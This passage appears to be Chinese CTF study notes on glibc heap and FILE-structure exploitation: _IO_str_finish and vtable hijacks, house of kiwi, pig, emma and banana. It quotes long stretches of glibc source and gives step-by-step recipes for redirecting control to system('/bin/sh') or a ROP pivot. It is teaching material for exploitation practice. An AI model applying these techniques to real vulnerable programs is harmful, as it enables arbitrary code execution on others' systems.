    (((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base);
    fp->_IO_buf_base = NULL;

    _IO_default_finish (fp, 0);
    }

  • vatble指针修改为指向&_IO_str_jumps - 8的地址就可以执行_IO_str_finish

  • fp->_IO_buf_base不为空,并且作为fp->_s._free_buffer的第一个参数,因此可以使用/bin/sh的地址

  • fp->_flags要不包含_IO_USER_BUF,它的定义为#define _IO_USER_BUF 1,即fp->_flags最低位为0

  • _IO_write_base < _IO_write_ptr_mode <= 0

  • 修改((_IO_strfile *) fp)->_s._free_buffersystem地址,即将fp+0xE8处的值改为system地址

  • 执行_IO_flush_all_lockp

堆利用结合

leak libc

libc-2.23

  • fastbin attack 在 _IO_2_1_stdout_-0x43 处申请 fastbin
  • 修改_IO_write_base指针的最低 1 字节使其指向_chain变量,而_chain变量中存储了_IO_2_1_stdin_结构体地址,程序在下一次输出内容时会先将 write buf 中的内容输出出来

vtable

  • fastbin attack_IO_2_1_stdout_+157地址处申请0x60大小的堆块
  • 修改vtable指针指向事先伪造的vtable(*(vtable+0x10)=system_addr),在调用IO函数时会将_IO_2_1_stdout_结构体指针作为参数传入vtable中的函数,因此可以在_IO_2_1_stdout_结构体flag字段之后的 4 字节填充中写入;sh;

house of orange

见attack ### house of husk 见attack ### house of kiwi(under 2.36) * 在没有exit下调用vtable sysmalloc

assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
__malloc_assert
static void
__malloc_assert (const char *assertion, const char *file, unsigned int line,
const char *function)
{
(void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
__progname, __progname[0] ? ": " : "",
file, line,
function ? function : "", function ? ": " : "",
assertion);
fflush (stderr);
abort ();
}
利用fflush中的_IO_fflush,会调用call [rbp + 0x60]rbp指向_IO_file_jumps_,调用的是_IO_new_file_sync,并且_IO_file_jumps_可写,因此只需要将_IO_file_jumps_对应_IO_new_file_sync函数指针的位置覆盖为one_gadget就可以获取

setcontext+61
.text:0000000000050C0D mov     rsp, [rdx+0A0h]
.text:0000000000050C14 mov rbx, [rdx+80h]
.text:0000000000050C1B mov rbp, [rdx+78h]
.text:0000000000050C1F mov r12, [rdx+48h]
.text:0000000000050C23 mov r13, [rdx+50h]
.text:0000000000050C27 mov r14, [rdx+58h]
.text:0000000000050C2B mov r15, [rdx+60h]
.text:0000000000050C2F test dword ptr fs:48h, 2
.text:0000000000050C3B jz loc_50CF6
...
.text:0000000000050CF6 loc_50CF6: ; CODE XREF: setcontext+6B↑j
.text:0000000000050CF6 mov rcx, [rdx+0A8h]
.text:0000000000050CFD push rcx
.text:0000000000050CFE mov rsi, [rdx+70h]
.text:0000000000050D02 mov rdi, [rdx+68h]
.text:0000000000050D06 mov rcx, [rdx+98h]
.text:0000000000050D0D mov r8, [rdx+28h]
.text:0000000000050D11 mov r9, [rdx+30h]
.text:0000000000050D15 mov rdx, [rdx+88h]
.text:0000000000050D15 ; } // starts at 50BD0
.text:0000000000050D1C ; __unwind {
.text:0000000000050D1C xor eax, eax
.text:0000000000050D1E retn

调用_IO_new_file_syncrdx指向的是_IO_helper_jumps_结构,可以通过修改_IO_helper_jumps_中的内容来给寄存器赋值

rop方法为例,需要设置rsp指向提前布置号的rop的起始位置,同时设置rip指向ret 指令

如果存在一个任意写,通过修改 _IO_file_jumps + 0x60_IO_file_sync指针为setcontext+61 修改IO_helper_jumps + 0xA0 and 0xA8分别为可迁移的存放有ROP的位置和ret指令的gadget位置,则可以进行栈迁移

house of pig(仍可以任意写)

  • 起码UAF
  1. 先用UAF漏洞泄露libc、heap
  2. 再用UAF修改largebinchunkfd_nextsizebk_nextsize位置,完成一次largebin attack,将一个堆地址写到__free_hook-0x8的位置,使得满足之后的tcache stashing unlink attack需要目标fake chunkbk位置内地址可写的条件
  3. 先构造同一大小的5tcache,继续用UAF修改该大小的smallbinchunkfd、bk位置,完成一次tcache stashing unlink attack,由于前一步已经将一个可写的堆地址,写到了__free_hook-0x8,所以可以将__free_hook-0x10的位置当作一个fake chunk,放入到tcache链表的头部,但是由于没有 malloc,我们无法将他申请出来
  4. 最后再用UAF修改largebinchunkfd_nextsizebk_nextsize位置,完成第二次largebin attack,将一个堆地址写到_IO_list_all的位置,从而在程序退出前fflush所有IO流的时候,将该堆地址当作一个FILE结构体,我们就能在该堆地址的位置来构造任意FILE结构了
  5. 在该堆地址构造FILE结构的时候,重点是将其vtable_IO_file_jumps修改为_IO_str_jumps,那么当原本应该调用IO_file_overflow的时候,就会转而调用如下的IO_str_overflow,而该函数是以传入的FILE地址本身为参数的,同时其中会连续调用malloc、memcpy、free函数,且三个函数的参数又都可以被该FILE结构中的数据控制。那么适当的构造FILE结构中的数据,就可以实现利用IO_str_overflow函数中的malloc申请出那个已经被放入到tcache链表的头部的包含__free_hookfake chunk;紧接着可以将提前在堆上布置好的数据,通过IO_str_overflow函数中的memcpy写入到刚刚申请出来的包含__free_hook的这个chunk,从而能任意控制__free_hook,这里可以将其修改为 system函数地址;最后调用IO_str_overflow函数中的free时,就能够触发__free_hook,同时还能在提前布置堆上数据的时候,使其以字符串/bin/sh\x00开头,那么最终就会执行system(“/bin/sh”)

house of emma

通过修改_IO_file_jumps_IO_cookie_jumps+offset,使得最后+偏移为_IO_cookie_write
然后在_IO_cookie_write中会直接调用指针,设置好偏移就可以去控制执行流

static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {  
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_default_xsgetn),
JUMP_INIT(seekoff, _IO_cookie_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_file_setbuf),
JUMP_INIT(sync, _IO_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_cookie_read),
JUMP_INIT(write, _IO_cookie_write),
JUMP_INIT(seek, _IO_cookie_seek),
JUMP_INIT(close, _IO_cookie_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue),
};

里面存在的_IO_cookie_read、_IO_cookie_write、_IO_cookie_seek、_IO_cookie_close

static ssize_t  
_IO_cookie_read (FILE *fp, void *buf, ssize_t size) // read
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (read_cb);
#endif

if (read_cb == NULL)
return -1;

return read_cb (cfile->__cookie, buf, size);
}

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size) // write
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif

if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}

ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;

return n;
}

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir) // seek
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (seek_cb);
#endif

return ((seek_cb == NULL
|| (seek_cb (cfile->__cookie, &offset, dir)
== -1)
|| offset == (off64_t) -1)
? _IO_pos_BAD : offset);
}

static int
_IO_cookie_close (FILE *fp) // close
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (close_cb);
#endif

if (close_cb == NULL)
return 0;

return close_cb (cfile->__cookie);
}

这几个函数中都存在直接的函数调用 当然在函数调用前存在一个检测PTR_DEMANGLE 调试过程可以发现,利用的fs[0x30],可以去修改该处值为我们已知值

house of banana

exit

main()函数return时,有一些析构工作需要完成 - 用户层面: - 需要释放libc中的流缓冲区,退出前清空下stdout的缓冲区,释放TLS, … - 内核层面: - 释放掉这个进程打开的文件描述符,释放掉task结构体,… - 再所有资源都被释放完毕后,内核会从调度队列从取出这个任务 - 然后向父进程发送一个信号,表示有一个子进程终止 - 此时这个进程才算是真正结束

因此我们可以认为: - 进程终止 => 释放其所占有的资源 + 不再分配CPU时间给这个进程

内核层面的终止是通过exit系统调用来进行的,其实现就是一个syscalllibc中声明为

#include <unistd.h> 
void _exit(int status);

但是如果直接调用_exit(),会出现一些问题,比如stdout的缓冲区中的数据会直接被内核释放掉,无法刷新,导致信息丢失 因此在调用_exit()之前,还需要在用户层面进行一些析构工作

libc将负责这个工作的函数定义为exit(),其声明如下

#include <stdlib.h> 
extern void exit (int __status);

void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}

void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit, bool run_dtors)
{
/* First, call the TLS destructors. */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

__libc_lock_lock (__exit_funcs_lock);

/* We do it this way to handle recursive calls to exit () made by
the functions registered with `atexit' and `on_exit'. We call
everyone on the list and use the status value in the last
exit (). */
while (true)
{
struct exit_function_list *cur = *listp;

if (cur == NULL)
{
/* Exit processing complete. We will not allow any more
atexit/on_exit registrations. */
__exit_funcs_done = true;
break;
}

while (cur->idx > 0)
{
struct exit_function *const f = &cur->fns[--cur->idx];
const uint64_t new_exitfn_called = __new_exitfn_called;

switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);
void *arg;

case ef_free:
case ef_us:
break;
case ef_on:
onfct = f->func.on.fn;
arg = f->func.on.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
onfct (status, arg);
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_at:
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
atfct ();
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_cxa:
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
arg = f->func.cxa.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
cxafct (arg, status);
__libc_lock_lock (__exit_funcs_lock);
break;
}

if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
/* The last exit function, or another thread, has registered
more exit functions. Start the loop over. */
continue;
}

*listp = cur->next;
if (*listp != NULL)
/* Don't free the last element in the chain, this is the statically
allocate element. */
free (cur);
}

__libc_lock_unlock (__exit_funcs_lock);

if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

_exit (status);
}

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};
extern struct exit_function_list *__exit_funcs attribute_hidden;

综上所述: * exit(status) *__run_exit_handlers(status)*__call_tls_dtors* 遍历exit_function_list*ef_cxa:调用__cxa_atexit注册函数 *ef_at:调用atexit注册的函数 *ef_on:调用on_exit注册的函数 * ... * 若执行期间有新的回调注册则回到链表头重新执行 * 释放动态分配的回调节点 * 如果run_list_atexit==true,则执行__libc_atexit* 最终调用_exit(status)`

__exit_funcs

函数指针要用fs:0x30解密

typedef struct  
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
int gscope_flag;
uintptr_t sysinfo;
uintptr_t stack_guard;
uintptr_t pointer_guard;
unsigned long int unused_vgetcpu_cache[2];
/* Bit 0: X86_FEATURE_1_IBT.
Bit 1: X86_FEATURE_1_SHSTK.
*/
unsigned int feature_1;
int __glibc_unused1;
/* Reservation of some values for the TM ABI. */
void *__private_tm[4];
/* GCC split stack support. */
void *__private_ss;
/* The lowest address of shadow stack, */
unsigned long long int ssp_base;
/* Must be kept even if it is no longer used by glibc since programs,
like AddressSanitizer, depend on the size of tcbhead_t. */
__128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

void *__padding[8];
} tcbhead_t;
exit_function注册

遍历链表执行的是atexit等函数注册的函数,我们找到atexit

/* Register FUNC to be executed by `exit'.  */
int
#ifndef atexit
attribute_hidden
#endif
atexit (void (*func) (void))
{
return __cxa_atexit ((void (*) (void *)) func, NULL, __dso_handle);
}
__cxa_atexit
/* Register a function to be called by exit or when a shared library
is unloaded. This function is only called from code generated by
the C++ compiler. */
int
__cxa_atexit (void (*func) (void *), void *arg, void *d)
{
return __internal_atexit (func, arg, d, &__exit_funcs);
}
libc_hidden_def (__cxa_atexit)
__internal_atexit
int
attribute_hidden
__internal_atexit (void (*func) (void *), void *arg, void *d,
struct exit_function_list **listp)
{
struct exit_function *new;

/* As a QoI issue we detect NULL early with an assertion instead
of a SIGSEGV at program exit when the handler is run (bug 20544). */
assert (func != NULL);

__libc_lock_lock (__exit_funcs_lock);
new = __new_exitfn (listp);

if (new == NULL)
{
__libc_lock_unlock (__exit_funcs_lock);
return -1;
}

#ifdef PTR_MANGLE
PTR_MANGLE (func);
#endif
new->func.cxa.fn = (void (*) (void *, int)) func;
new->func.cxa.arg = arg;
new->func.cxa.dso_handle = d;
new->flavor = ef_cxa;
__libc_lock_unlock (__exit_funcs_lock);
return 0;
}
__new_exitfn
/* Must be called with __exit_funcs_lock held.  */
struct exit_function *
__new_exitfn (struct exit_function_list **listp)
{
struct exit_function_list *p = NULL;
struct exit_function_list *l;
struct exit_function *r = NULL;
size_t i = 0;

if (__exit_funcs_done)
/* Exit code is finished processing all registered exit functions,
therefore we fail this registration. */
return NULL;

for (l = *listp; l != NULL; p = l, l = l->next)
{
for (i = l->idx; i > 0; --i)
if (l->fns[i - 1].flavor != ef_free)
break;

if (i > 0)
break;

/* This block is completely unused. */
l->idx = 0;
}

if (l == NULL || i == sizeof (l->fns) / sizeof (l->fns[0]))
{
/* The last entry in a block is used. Use the first entry in
the previous block if it exists. Otherwise create a new one. */
if (p == NULL)
{
assert (l != NULL);
p = (struct exit_function_list *)
calloc (1, sizeof (struct exit_function_list));
if (p != NULL)
{
p->next = *listp;
*listp = p;
}
}

if (p != NULL)
{
r = &p->fns[0];
p->idx = 1;
}
}
else
{
/* There is more room in the block. */
r = &l->fns[i];
l->idx = i + 1;
}

/* Mark entry as used, but we don't know the flavor now. */
if (r != NULL)
{
r->flavor = ef_us;
++__new_exitfn_called;
}

return r;
}

先尝试在__exit_funcs中找到一个exit_function类型的ef_free的位置, ef_free代表着此位置空闲

如果没找到, 就新建一个exit_function节点, 使用头插法插入__exit_funcs链表, 使用新节点的第一个位置作为分配到的exit_function结构体设置找到的exit_function的类型为ef_us, 表示正在使用中, 并返回

这里只是找位置,那么注册的是什么函数呢?这些函数在main之前就被注册了,我们看一下程序的入口_start

_start

ENTRY (_start)
/* Clearing frame pointer is insufficient, use CFI. */
cfi_undefined (rip)
/* Clear the frame pointer. The ABI suggests this be done, to mark
the outermost frame obviously. */
xorl %ebp, %ebp

/* Extract the arguments as encoded on the stack and set up
the arguments for __libc_start_main (int (*main) (int, char **, char **),
int argc, char *argv,
void (*init) (void), void (*fini) (void),
void (*rtld_fini) (void), void *stack_end).
The arguments are passed via registers and on the stack:
main: %rdi
argc: %rsi
argv: %rdx
init: %rcx
fini: %r8
rtld_fini: %r9
stack_end: stack. */

mov %RDX_LP, %R9_LP /* Address of the shared library termination
function. */
#ifdef __ILP32__
mov (%rsp), %esi /* Simulate popping 4-byte argument count. */
add $4, %esp
#else
popq %rsi /* Pop the argument count. */
#endif
/* argv starts just at the current stack top. */
mov %RSP_LP, %RDX_LP
/* Align the stack to a 16 byte boundary to follow the ABI. */
and $~15, %RSP_LP

/* Push garbage because we push 8 more bytes. */
pushq %rax

/* Provide the highest stack address to the user code (for stacks
which grow downwards). */
pushq %rsp

/* These used to be the addresses of .fini and .init. */
xorl %r8d, %r8d
xorl %ecx, %ecx

#ifdef PIC
mov main@GOTPCREL(%rip), %RDI_LP
#else
mov $main, %RDI_LP
#endif

/* Call the user's main function, and exit with its value.
But let the libc call main. Since __libc_start_main in
libc.so is called very early, lazy binding isn't relevant
here. Use indirect branch via GOT to avoid extra branch
to PLT slot. In case of static executable, ld in binutils
2.26 or above can convert indirect branch into direct
branch. */
call *__libc_start_main@GOTPCREL(%rip)

hlt /* Crash if somehow `exit' does return. */
END (_start)

/* Define a symbol for the first piece of initialized data. */
.data
.globl __data_start
__data_start:
.long 0
.weak data_start
data_start = __data_start

我们关注其传递给__libc_start_main的参数mainargcargvinitfinirtld_finistack_end,前三个不用赘述,initfinirtld_fini

/* Note: The init and fini parameters are no longer used.  fini is
completely unused, init is still called if not NULL, but the
current startup code always passes NULL. (In the future, it would
be possible to use fini to pass a version code if init is NULL, to
indicate the link-time glibc without introducing a hard
incompatibility for new programs with older glibc versions.)

For dynamically linked executables, the dynamic segment is used to
locate constructors and destructors. For statically linked
executables, the relevant symbols are access directly. */
STATIC int
LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv,
#ifdef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec,
#endif
__typeof (main) init,
void (*fini) (void),
void (*rtld_fini) (void), void *stack_end)
{
#ifndef SHARED
char **ev = &argv[argc + 1];

__environ = ev;

/* Store the lowest stack address. This is done in ld.so if this is
the code for the DSO. */
__libc_stack_end = stack_end;

# ifdef HAVE_AUX_VECTOR
/* First process the auxiliary vector since we need to find the
program header to locate an eventually present PT_TLS entry. */
# ifndef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec;
{
char **evp = ev;
while (*evp++ != NULL)
;
auxvec = (ElfW(auxv_t) *) evp;
}
# endif
_dl_aux_init (auxvec);
if (GL(dl_phdr) == NULL)
# endif
{
/* Starting from binutils-2.23, the linker will define the
magic symbol __ehdr_start to point to our own ELF header
if it is visible in a segment that also includes the phdrs.
So we can set up _dl_phdr and _dl_phnum even without any
information from auxv. */

extern const ElfW(Ehdr) __ehdr_start
# if BUILD_PIE_DEFAULT
__attribute__ ((visibility ("hidden")));
# else
__attribute__ ((weak, visibility ("hidden")));
if (&__ehdr_start != NULL)
# endif
{
assert (__ehdr_start.e_phentsize == sizeof *GL(dl_phdr));
GL(dl_phdr) = (const void *) &__ehdr_start + __ehdr_start.e_phoff;
GL(dl_phnum) = __ehdr_start.e_phnum;
}
}

/* Initialize very early so that tunables can use it. */
__libc_init_secure ();

__tunables_init (__environ);

ARCH_INIT_CPU_FEATURES ();

/* Do static pie self relocation after tunables and cpu features
are setup for ifunc resolvers. Before this point relocations
must be avoided. */
_dl_relocate_static_pie ();

/* Perform IREL{,A} relocations. */
ARCH_SETUP_IREL ();

/* The stack guard goes into the TCB, so initialize it early. */
ARCH_SETUP_TLS ();

/* In some architectures, IREL{,A} relocations happen after TLS setup in
order to let IFUNC resolvers benefit from TCB information, e.g. powerpc's
hwcap and platform fields available in the TCB. */
ARCH_APPLY_IREL ();

/* Set up the stack checker's canary. */
uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
__stack_chk_guard = stack_chk_guard;
# endif

# ifdef DL_SYSDEP_OSCHECK
{
/* This needs to run to initiliaze _dl_osversion before TLS
setup might check it. */
DL_SYSDEP_OSCHECK (__libc_fatal);
}
# endif

/* Initialize libpthread if linked in. */
if (__pthread_initialize_minimal != NULL)
__pthread_initialize_minimal ();

/* Set up the pointer guard value. */
uintptr_t pointer_chk_guard = _dl_setup_pointer_guard (_dl_random,
stack_chk_guard);
# ifdef THREAD_SET_POINTER_GUARD
THREAD_SET_POINTER_GUARD (pointer_chk_guard);
# else
__pointer_chk_guard_local = pointer_chk_guard;
# endif

#endif /* !SHARED */

/* Register the destructor of the dynamic linker if there is any. */
if (__glibc_likely (rtld_fini != NULL))
__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);

#ifndef SHARED
/* Perform early initialization. In the shared case, this function
is called from the dynamic loader as early as possible. */
__libc_early_init (true);

/* Call the initializer of the libc. This is only needed here if we
are compiling for the static library in which case we haven't
run the constructors in `_dl_start_user'. */
__libc_init_first (argc, argv, __environ);

/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

/* Some security at this point. Prevent starting a SUID binary where
the standard file descriptors are not opened. We have to do this
only for statically linked applications since otherwise the dynamic
loader did the work already. */
if (__builtin_expect (__libc_enable_secure, 0))
__libc_check_standard_fds ();
#endif /* !SHARED */

/* Call the initializer of the program, if any. */
#ifdef SHARED
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
GLRO(dl_debug_printf) ("\ninitialize program: %s\n\n", argv[0]);

if (init != NULL)
/* This is a legacy program which supplied its own init
routine. */
(*init) (argc, argv, __environ MAIN_AUXVEC_PARAM);
else
/* This is a current program. Use the dynamic segment to find
constructors. */
call_init (argc, argv, __environ);

/* Auditing checkpoint: we have a new object. */
_dl_audit_preinit (GL(dl_ns)[LM_ID_BASE]._ns_loaded);

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
GLRO(dl_debug_printf) ("\ntransferring control: %s\n\n", argv[0]);
#else /* !SHARED */
call_init (argc, argv, __environ);

_dl_debug_initialize (0, LM_ID_BASE);
#endif

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);
}

/* Starting with glibc 2.34, the init parameter is always NULL. Older
libcs are not prepared to handle that. The macro
DEFINE_LIBC_START_MAIN_VERSION creates GLIBC_2.34 alias, so that
newly linked binaries reflect that dependency. The macros below
expect that the exported function is called
__libc_start_main_impl. */

glibc2.34以后,initfini两个参数已经废弃,可以看到,其内部自行使用了call_init函数

/* Initialization for dynamic executables.  Find the main executable
link map and run its init functions. */
static void
call_init (int argc, char **argv, char **env)
{
/* Obtain the main map of the executable. */
struct link_map *l = GL(dl_ns)[LM_ID_BASE]._ns_loaded;

/* DT_PREINIT_ARRAY is not processed here. It is already handled in
_dl_init in elf/dl-init.c. Also see the call_init function in
the same file. */

if (ELF_INITFINI && l->l_info[DT_INIT] != NULL)
DL_CALL_DT_INIT(l, l->l_addr + l->l_info[DT_INIT]->d_un.d_ptr,
argc, argv, env);

ElfW(Dyn) *init_array = l->l_info[DT_INIT_ARRAY];
if (init_array != NULL)
{
unsigned int jm
= l->l_info[DT_INIT_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr));
ElfW(Addr) *addrs = (void *) (init_array->d_un.d_ptr + l->l_addr);
for (unsigned int j = 0; j < jm; ++j)
((dl_init_t) addrs[j]) (argc, argv, env);
}
}

/* Initialization for static executables. There is no dynamic
segment, so we access the symbols directly. */
static void
call_init (int argc, char **argv, char **envp)
{
/* For static executables, preinit happens right before init. */
{
const size_t size = __preinit_array_end - __preinit_array_start;
size_t i;
for (i = 0; i < size; i++)
(*__preinit_array_start [i]) (argc, argv, envp);
}

# if ELF_INITFINI
_init ();
# endif

const size_t size = __init_array_end - __init_array_start;
for (size_t i = 0; i < size; i++)
(*__init_array_start [i]) (argc, argv, envp);
}

可以看到这里,对于动态链接程序先获取link_map,然后执行.init,再遍历 .init_array 函数数组,执行程序和共享库的所有构造函数。而对于动态链接器的构造函数则由另一个函数_dl_init再调用call_init执行,这个函数如下

void
_dl_init (struct link_map *main_map, int argc, char **argv, char **env)
{
ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY];
ElfW(Dyn) *preinit_array_size = main_map->l_info[DT_PREINIT_ARRAYSZ];
unsigned int i;

if (__glibc_unlikely (GL(dl_initfirst) != NULL))
{
call_init (GL(dl_initfirst), argc, argv, env);
GL(dl_initfirst) = NULL;
}

/* Don't do anything if there is no preinit array. */
if (__builtin_expect (preinit_array != NULL, 0)
&& preinit_array_size != NULL
&& (i = preinit_array_size->d_un.d_val / sizeof (ElfW(Addr))) > 0)
{
ElfW(Addr) *addrs;
unsigned int cnt;

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
_dl_debug_printf ("\ncalling preinit: %s\n\n",
DSO_FILENAME (main_map->l_name));

addrs = (ElfW(Addr) *) (preinit_array->d_un.d_ptr + main_map->l_addr);
for (cnt = 0; cnt < i; ++cnt)
((dl_init_t) addrs[cnt]) (argc, argv, env);
}

/* Stupid users forced the ELF specification to be changed. It now
says that the dynamic loader is responsible for determining the
order in which the constructors have to run. The constructors
for all dependencies of an object must run before the constructor
for the object itself. Circular dependencies are left unspecified.

This is highly questionable since it puts the burden on the dynamic
loader which has to find the dependencies at runtime instead of
letting the user do it right. Stupidity rules! */

i = main_map->l_searchlist.r_nlist;
while (i-- > 0)
call_init (main_map->l_initfini[i], argc, argv, env);

#ifndef HAVE_INLINED_SYSCALLS
/* Finished starting up. */
_dl_starting_up = 0;
#endif
}
_dl_init又由谁调用呢?这里发现另一个_start(?),位于dl-start.S动态链接器的入口点),上文的_start位于start.S程序的入口点)

/* Initial entry point code for the dynamic linker.
The function _dl_start is the real entry point;
it's return value is the user program's entry point. */
ENTRY (_start)
/* Count arguments in r11 */
l.ori r3, r1, 0
l.movhi r11, 0
1:
l.addi r3, r3, 4
l.lwz r12, 0(r3)
l.sfnei r12, 0
l.addi r11, r11, 1
l.bf 1b
l.nop
l.addi r11, r11, -1
/* store argument counter to stack. */
l.sw 0(r1), r11

/* Load the PIC register. */
l.jal 0x8
l.movhi r16, gotpchi(_GLOBAL_OFFSET_TABLE_-4)
l.ori r16, r16, gotpclo(_GLOBAL_OFFSET_TABLE_+0)
l.add r16, r16, r9

l.ori r3, r1, 0

l.jal _dl_start
l.nop
/* Save user entry in a call saved reg. */
l.ori r22, r11, 0
/* Fall through to _dl_start_user. */

_dl_start_user:
/* Set up for _dl_init. */

/* Load _rtld_local (a.k.a _dl_loaded). */
l.lwz r12, got(_rtld_local)(r16)
l.lwz r3, 0(r12)

/* Load argc */
l.lwz r18, got(_dl_argc)(r16)
l.lwz r4, 0(r18)

/* Load argv */
l.lwz r20, got(_dl_argv)(r16)
l.lwz r5, 0(r20)

/* Load envp = &argv[argc + 1]. */
l.slli r6, r4, 2
l.addi r6, r6, 4
l.add r6, r6, r5

l.jal plt(_dl_init)
l.nop

/* Now set up for user entry.
The already defined ABI loads argc and argv from the stack.

argc = 0(r1)
argv = r1 + 4
*/

/* Load SP as argv - 4. */
l.lwz r3, 0(r20)
l.addi r1, r3, -4

/* Save argc. */
l.lwz r3, 0(r18)
l.sw 0(r1), r3

/* Pass _dl_fini function address to _start.
Next start.S will then pass this as rtld_fini to __libc_start_main. */
l.lwz r3, got(_dl_fini)(r16)

l.jr r22
l.nop

END (_start)

发现正是这里调用了_dl_start_dl_init
如此完成初始化构造,可以看到call_fini静态链接程序),rtld_fini动态链接程序)也是在__libc_start_main完成注册的

__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);
...
/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

__libc_start_main的最后

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);

_Noreturn static __always_inline void
__libc_start_call_main (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv MAIN_AUXVEC_DECL)
{
exit (main (argc, argv, __environ MAIN_AUXVEC_PARAM));
}

正是它最终调用main以及exit,同时这也解释了为什么main函数返回地址总是在__libc_start_call_main的一定偏移处。
现在我们再看被注册的rtld_fini,其实际调用_dl_fini函数,作用是调用进程空间中所有模块的析构函数,也就是遍历.fini_array,看其源码的这一段

/* Is there a destructor function?  */
if (l->l_info[DT_FINI_ARRAY] != NULL
|| (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
{
/* When debugging print a message first. */
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
_dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
DSO_FILENAME (l->l_name),
ns);

/* First see whether an array is given. */
if (l->l_info[DT_FINI_ARRAY] != NULL)
{
ElfW(Addr) *array =
(ElfW(Addr) *) (l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
/ sizeof (ElfW(Addr)));
while (i-- > 0)
((fini_t) array[i]) ();
}

/* Next try the old-style destructor. */
if (ELF_INITFINI && l->l_info[DT_FINI] != NULL)
DL_CALL_DT_FINI
(l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
}

这里执行了.fini以及遍历了.fini_array

总结

  • 内核执行execve()系统调用
